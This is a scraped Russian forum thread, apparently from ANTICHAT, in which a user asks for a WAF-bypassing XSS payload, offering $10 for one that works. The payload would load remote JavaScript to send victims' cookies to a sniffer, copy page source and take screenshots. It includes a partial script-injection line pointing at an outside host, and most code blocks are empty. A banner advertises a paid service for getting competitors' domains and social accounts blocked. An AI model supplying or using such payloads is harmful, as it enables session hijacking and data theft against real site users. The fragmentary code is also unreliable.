УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
[XSS вектор] Подгрузка JS через . Обход фильтров.

Опции темы

Поиск в этой теме

Опции просмотра

24.11.2017, 17:09

Elva

Guest

Сообщений: n/a

Провел на форуме:
5299

Репутация: 0

Приветствую.

Имеется: XSS вида, https://host.com/parametr?i='/>XSS

Задача

Обойти фильтр и подгрузить js код с хоста https://site.com/, в нем передача cookie на сниффер, парсинг исходного кода страницы и скриншот страницы.

Работает: ,

Фильтр: WAF фильтрует теги указанные ниже, в base64 не отрабатывает.

Код:

Code:

Код:

Code:
javascript:

Код:

Code:
var s = document.createElement('script'); s.src='https://domen.com/1

Код:

Code:

Пробовал использовать пейлоады с OWASP, работают практически все html теги, он img до input..

Буду премного благодарен за помощь в написании правильного пайлода с img для исполнения js кода с хоста.

p.s за работоспособное решение оплачу 10$ на кофе